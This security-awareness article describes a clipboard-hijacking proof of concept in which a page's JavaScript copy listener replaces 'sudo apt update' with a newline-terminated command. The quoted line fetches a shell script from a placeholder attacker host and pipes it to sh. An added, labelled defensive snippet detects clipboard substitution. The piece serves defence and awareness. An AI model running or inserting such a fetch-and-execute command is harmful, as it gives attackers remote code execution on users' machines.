According to a recent warning, programmers, security researchers, sysadmins, and tech hobbyists who copy and paste instructions from websites into a console or terminal risk having their system infected. A techie has shown a simple method that will make you reconsider copying and pasting text from blogs and websites.
Gabriel Friedlander, the founder of security awareness training platform Wizer, has shown an obvious yet surprising hack that will make you think twice about copying and pasting commands from websites. It’s not uncommon for rookie and experienced developers alike to copy regularly used instructions from a webpage and paste them into their programs, a Linux terminal, or a Windows command prompt.
However, Friedlander warns that a webpage can discreetly change what goes onto your clipboard, so that what you paste is significantly different from what you meant to copy. Worse, a developer who doesn’t conduct the necessary due diligence may only notice the mistake after pasting the text. By then it might be too late.
In a basic proof of concept (PoC) posted on his blog, Friedlander invites readers to copy a simple command most sysadmins and developers are acquainted with. He then asks them to paste what they copied into a text window such as Notepad, where something unexpected appears:
curl http://attacker-domain:8000/shell.sh | sh
Not only does the clipboard contain an entirely different command, but that command also ends with a newline (or return) character. This means the command above will run as soon as it is pasted into a Linux terminal, without the user pressing Enter.
Those pasting the text may have mistakenly assumed they were copying the simple sudo apt update command, which is used to get updated information about software installed on their machine. That, however, was not the case.
The secret is in the JavaScript code concealed underneath Friedlander’s PoC HTML page. The code snippet executes when you copy the “sudo apt update” content from an HTML element. The copy event is captured by a JavaScript “event listener,” which replaces the clipboard data with Friedlander’s malicious test code. Note that event listeners in JavaScript have many legitimate uses; this is only one example of their being abused.
“This is why you should NEVER copy paste commands directly into your terminal,” cautions Friedlander. “You think you are copying one thing, but it’s replaced with something else, like malicious code. All it takes is a single line of code injected into the code you copied to create a backdoor to your app.”
“This attack is very simple but also very harmful.”
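The substitution described above can be detected by comparing the text the user selected with the text that actually lands on the clipboard. The following is an added example, not code from Friedlander's PoC or blog; the function name auditClipboard and its finding labels are hypothetical, and the browser hook assumes it runs as a user script after the page's own copy handlers.

```javascript
// Added example (not from the original PoC): flag clipboard text that differs
// from the visible selection or that would auto-execute when pasted.
function auditClipboard(selectedText, clipboardText) {
  const findings = [];
  // Ignore surrounding whitespace only; any other difference is a rewrite.
  if (clipboardText.trim() !== selectedText.trim()) {
    findings.push('content-mismatch');
  }
  // A trailing CR/LF makes a shell run the line the moment it is pasted.
  if (/[\r\n]\s*$/.test(clipboardText)) {
    findings.push('trailing-newline');
  }
  // Line breaks before the end mean several commands arrive in one paste.
  if (/[\r\n]/.test(clipboardText.replace(/[\r\n\s]+$/, ''))) {
    findings.push('multi-line');
  }
  // ESC, backspace and similar bytes can hide or alter text in a terminal.
  if (/[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/.test(clipboardText)) {
    findings.push('control-characters');
  }
  return findings;
}

// Browser wiring (skipped outside a browser). A page that rewrites the
// clipboard must call preventDefault() and setData() in its copy handler, so
// only prevented events are inspected. Limitation: a page handler that stops
// propagation before the event reaches window is not seen by this listener.
if (typeof window !== 'undefined') {
  window.addEventListener('copy', (event) => {
    if (!event.defaultPrevented || !event.clipboardData) return;
    const selected = String(window.getSelection());
    const copied = event.clipboardData.getData('text/plain');
    const findings = auditClipboard(selected, copied);
    if (findings.length > 0) {
      console.warn('Clipboard differs from selection:', findings, copied);
    }
  });
}
```

Run against the two strings from the article, the check reports both the rewritten content and the trailing newline that causes immediate execution.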